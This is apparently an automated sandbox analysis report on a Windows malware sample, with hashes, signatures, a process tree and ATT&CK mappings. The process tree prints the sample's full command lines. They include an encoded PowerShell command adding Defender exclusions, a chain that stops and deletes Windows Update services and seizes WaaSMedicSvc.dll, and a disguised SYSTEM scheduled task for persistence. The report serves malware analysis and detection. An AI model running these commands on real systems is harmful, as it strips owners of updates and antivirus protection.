Analysis

  • max time kernel
    268s
  • max time network
    175s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    10-05-2022 04:50

General

  • Target

    465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe

  • Size

    2.0MB

  • MD5

    79dbc1a54d33366681f1e926d565cad4

  • SHA1

    907cf0ec6784bf140f9759d6931d3697da0fc229

  • SHA256

    465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0

  • SHA512

    6d66ae7edc6028e8bc1eac9caf85f5d2d38a6c000e5fa907c9eec5786b225aeeb7c0b565bee9aa7b09f6f792d0857e3d06f0e3ed832d73047506a18ce15371dd

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • Executes dropped EXE 1 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 39 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe
    "C:\Users\Admin\AppData\Local\Temp\465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4016
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe"
      2⤵
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4700
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2952
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4736
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2784
        • C:\Windows\system32\sc.exe
          sc stop UsoSvc
          4⤵
            PID:3472
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            4⤵
              PID:4848
            • C:\Windows\system32\sc.exe
              sc stop wuauserv
              4⤵
                PID:1648
              • C:\Windows\system32\sc.exe
                sc stop bits
                4⤵
                  PID:3052
                • C:\Windows\system32\sc.exe
                  sc stop dosvc
                  4⤵
                    PID:3456
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                    4⤵
                    • Modifies registry key
                    PID:4776
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                    4⤵
                    • Modifies registry key
                    PID:2160
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                    4⤵
                    • Modifies security service
                    • Modifies registry key
                    PID:4948
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                    4⤵
                    • Modifies registry key
                    PID:5064
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                    4⤵
                    • Modifies registry key
                    PID:2136
                  • C:\Windows\system32\takeown.exe
                    takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                    4⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3692
                  • C:\Windows\system32\icacls.exe
                    icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                    4⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:4484
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:4580
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:3348
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:3172
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:5020
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                    4⤵
                      PID:5012
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                      4⤵
                        PID:3380
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                        4⤵
                          PID:4932
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                          4⤵
                            PID:4288
                          • C:\Windows\system32\schtasks.exe
                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                            4⤵
                              PID:3236
                            • C:\Windows\system32\schtasks.exe
                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                              4⤵
                                PID:3476
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                4⤵
                                  PID:4492
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
                                3⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2792
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
                                  4⤵
                                  • Creates scheduled task(s)
                                  PID:4896
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                3⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3816
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                  4⤵
                                    PID:4628
                            • C:\Program Files\Windows\services.exe
                              "C:\Program Files\Windows\services.exe"
                              1⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:4352
                              • C:\Windows\System32\conhost.exe
                                "C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"
                                2⤵
                                • Drops file in System32 directory
                                • Suspicious use of SetThreadContext
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3460
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="
                                  3⤵
                                    PID:4656
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="
                                      4⤵
                                      • Drops file in System32 directory
                                      • Modifies data under HKEY_USERS
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1088
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                    3⤵
                                      PID:1312
                                      • C:\Windows\system32\sc.exe
                                        sc stop UsoSvc
                                        4⤵
                                          PID:952
                                        • C:\Windows\system32\sc.exe
                                          sc stop WaaSMedicSvc
                                          4⤵
                                            PID:4784
                                          • C:\Windows\system32\sc.exe
                                            sc stop wuauserv
                                            4⤵
                                              PID:2244
                                            • C:\Windows\system32\sc.exe
                                              sc stop bits
                                              4⤵
                                                PID:4824
                                              • C:\Windows\system32\sc.exe
                                                sc stop dosvc
                                                4⤵
                                                  PID:4836
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:4032
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:4740
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:4508
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:2900
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:1012
                                                • C:\Windows\system32\takeown.exe
                                                  takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3472
                                                • C:\Windows\system32\icacls.exe
                                                  icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:4848
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:4320
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:1804
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:4952
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:5068
                                                • C:\Windows\system32\schtasks.exe
                                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                                  4⤵
                                                    PID:624
                                                  • C:\Windows\system32\schtasks.exe
                                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                                    4⤵
                                                      PID:3560
                                                    • C:\Windows\system32\schtasks.exe
                                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                                      4⤵
                                                        PID:4792
                                                      • C:\Windows\system32\schtasks.exe
                                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                                        4⤵
                                                          PID:3796
                                                        • C:\Windows\system32\schtasks.exe
                                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                                          4⤵
                                                            PID:4896
                                                          • C:\Windows\system32\schtasks.exe
                                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                                            4⤵
                                                              PID:3868
                                                            • C:\Windows\system32\schtasks.exe
                                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                              4⤵
                                                                PID:3176
                                                            • C:\Windows\System32\conhost.exe
                                                              C:\Windows\System32\conhost.exe
                                                              3⤵
                                                                PID:4844
                                                                • C:\Windows\System32\conhost.exe
                                                                  "C:\Windows\System32\conhost.exe" "dycqfudelnyzo"
                                                                  4⤵
                                                                    PID:3372

                                                            Network

                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                            Execution

                                                            Scheduled Task

                                                            1
                                                            T1053

                                                            Persistence

                                                            Modify Existing Service

                                                            2
                                                            T1031

                                                            Scheduled Task

                                                            1
                                                            T1053

                                                            Privilege Escalation

                                                            Scheduled Task

                                                            1
                                                            T1053

                                                            Defense Evasion

                                                            Modify Registry

                                                            2
                                                            T1112

                                                            Impair Defenses

                                                            1
                                                            T1562

                                                            File Permissions Modification

                                                            1
                                                            T1222

                                                            Impact

                                                            Service Stop

                                                            1
                                                            T1489

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\Program Files\Windows\services.exe
                                                              Filesize

                                                              2.0MB

                                                              MD5

                                                              79dbc1a54d33366681f1e926d565cad4

                                                              SHA1

                                                              907cf0ec6784bf140f9759d6931d3697da0fc229

                                                              SHA256

                                                              465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0

                                                              SHA512

                                                              6d66ae7edc6028e8bc1eac9caf85f5d2d38a6c000e5fa907c9eec5786b225aeeb7c0b565bee9aa7b09f6f792d0857e3d06f0e3ed832d73047506a18ce15371dd

                                                            • C:\Program Files\Windows\services.exe
                                                              Filesize

                                                              2.0MB

                                                              MD5

                                                              79dbc1a54d33366681f1e926d565cad4

                                                              SHA1

                                                              907cf0ec6784bf140f9759d6931d3697da0fc229

                                                              SHA256

                                                              465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0

                                                              SHA512

                                                              6d66ae7edc6028e8bc1eac9caf85f5d2d38a6c000e5fa907c9eec5786b225aeeb7c0b565bee9aa7b09f6f792d0857e3d06f0e3ed832d73047506a18ce15371dd

                                                            • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
                                                              Filesize

                                                              539B

                                                              MD5

                                                              84f2160705ac9a032c002f966498ef74

                                                              SHA1

                                                              e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

                                                              SHA256

                                                              7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

                                                              SHA512

                                                              f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

                                                            • memory/624-385-0x0000000000000000-mapping.dmp
                                                            • memory/952-361-0x0000000000000000-mapping.dmp
                                                            • memory/1012-370-0x0000000000000000-mapping.dmp
                                                            • memory/1088-268-0x0000025CD79E0000-0x0000025CD79EA000-memory.dmp
                                                              Filesize

                                                              40KB

                                                            • memory/1088-235-0x0000025CD7BD0000-0x0000025CD7C89000-memory.dmp
                                                              Filesize

                                                              740KB

                                                            • memory/1088-229-0x0000025CD79F0000-0x0000025CD7A0C000-memory.dmp
                                                              Filesize

                                                              112KB

                                                            • memory/1088-211-0x0000000000000000-mapping.dmp
                                                            • memory/1312-360-0x0000000000000000-mapping.dmp
                                                            • memory/1648-172-0x0000000000000000-mapping.dmp
                                                            • memory/1804-382-0x0000000000000000-mapping.dmp
                                                            • memory/2136-179-0x0000000000000000-mapping.dmp
                                                            • memory/2160-176-0x0000000000000000-mapping.dmp
                                                            • memory/2244-363-0x0000000000000000-mapping.dmp
                                                            • memory/2784-169-0x0000000000000000-mapping.dmp
                                                            • memory/2792-181-0x0000000000000000-mapping.dmp
                                                            • memory/2900-369-0x0000000000000000-mapping.dmp
                                                            • memory/2952-128-0x0000000000000000-mapping.dmp
                                                            • memory/3052-173-0x0000000000000000-mapping.dmp
                                                            • memory/3172-186-0x0000000000000000-mapping.dmp
                                                            • memory/3176-391-0x0000000000000000-mapping.dmp
                                                            • memory/3236-192-0x0000000000000000-mapping.dmp
                                                            • memory/3348-185-0x0000000000000000-mapping.dmp
                                                            • memory/3372-401-0x0000019D2DC30000-0x0000019D2DC37000-memory.dmp
                                                              Filesize

                                                              28KB

                                                            • memory/3372-398-0x0000019D2DFC0000-0x0000019D2DFC6000-memory.dmp
                                                              Filesize

                                                              24KB

                                                            • memory/3380-189-0x0000000000000000-mapping.dmp
                                                            • memory/3456-174-0x0000000000000000-mapping.dmp
                                                            • memory/3460-381-0x00000243655E0000-0x00000243655F2000-memory.dmp
                                                              Filesize

                                                              72KB

                                                            • memory/3460-373-0x000002434CC50000-0x000002434CC56000-memory.dmp
                                                              Filesize

                                                              24KB

                                                            • memory/3472-170-0x0000000000000000-mapping.dmp
                                                            • memory/3472-371-0x0000000000000000-mapping.dmp
                                                            • memory/3476-193-0x0000000000000000-mapping.dmp
                                                            • memory/3560-386-0x0000000000000000-mapping.dmp
                                                            • memory/3692-180-0x0000000000000000-mapping.dmp
                                                            • memory/3796-388-0x0000000000000000-mapping.dmp
                                                            • memory/3816-195-0x0000000000000000-mapping.dmp
                                                            • memory/3868-390-0x0000000000000000-mapping.dmp
                                                            • memory/4032-366-0x0000000000000000-mapping.dmp
                                                            • memory/4288-191-0x0000000000000000-mapping.dmp
                                                            • memory/4320-380-0x0000000000000000-mapping.dmp
                                                            • memory/4484-182-0x0000000000000000-mapping.dmp
                                                            • memory/4492-194-0x0000000000000000-mapping.dmp
                                                            • memory/4508-368-0x0000000000000000-mapping.dmp
                                                            • memory/4580-184-0x0000000000000000-mapping.dmp
                                                            • memory/4628-197-0x0000000000000000-mapping.dmp
                                                            • memory/4656-210-0x0000000000000000-mapping.dmp
                                                            • memory/4700-141-0x0000010F52690000-0x0000010F5286D000-memory.dmp
                                                              Filesize

                                                              1.9MB

                                                            • memory/4700-121-0x0000010F6D000000-0x0000010F6D1DC000-memory.dmp
                                                              Filesize

                                                              1.9MB

                                                            • memory/4736-140-0x000002007BD10000-0x000002007BD86000-memory.dmp
                                                              Filesize

                                                              472KB

                                                            • memory/4736-135-0x0000020079A30000-0x0000020079A52000-memory.dmp
                                                              Filesize

                                                              136KB

                                                            • memory/4736-129-0x0000000000000000-mapping.dmp
                                                            • memory/4740-367-0x0000000000000000-mapping.dmp
                                                            • memory/4776-175-0x0000000000000000-mapping.dmp
                                                            • memory/4784-362-0x0000000000000000-mapping.dmp
                                                            • memory/4792-387-0x0000000000000000-mapping.dmp
                                                            • memory/4824-364-0x0000000000000000-mapping.dmp
                                                            • memory/4836-365-0x0000000000000000-mapping.dmp
                                                            • memory/4844-375-0x0000000000401BEA-mapping.dmp
                                                            • memory/4844-379-0x0000000000400000-0x000000000040C000-memory.dmp
                                                              Filesize

                                                              48KB

                                                            • memory/4844-374-0x0000000000400000-0x000000000040C000-memory.dmp
                                                              Filesize

                                                              48KB

                                                            • memory/4848-171-0x0000000000000000-mapping.dmp
                                                            • memory/4848-372-0x0000000000000000-mapping.dmp
                                                            • memory/4896-183-0x0000000000000000-mapping.dmp
                                                            • memory/4896-389-0x0000000000000000-mapping.dmp
                                                            • memory/4932-190-0x0000000000000000-mapping.dmp
                                                            • memory/4948-177-0x0000000000000000-mapping.dmp
                                                            • memory/4952-383-0x0000000000000000-mapping.dmp
                                                            • memory/5012-188-0x0000000000000000-mapping.dmp
                                                            • memory/5020-187-0x0000000000000000-mapping.dmp
                                                            • memory/5064-178-0x0000000000000000-mapping.dmp
                                                            • memory/5068-384-0x0000000000000000-mapping.dmp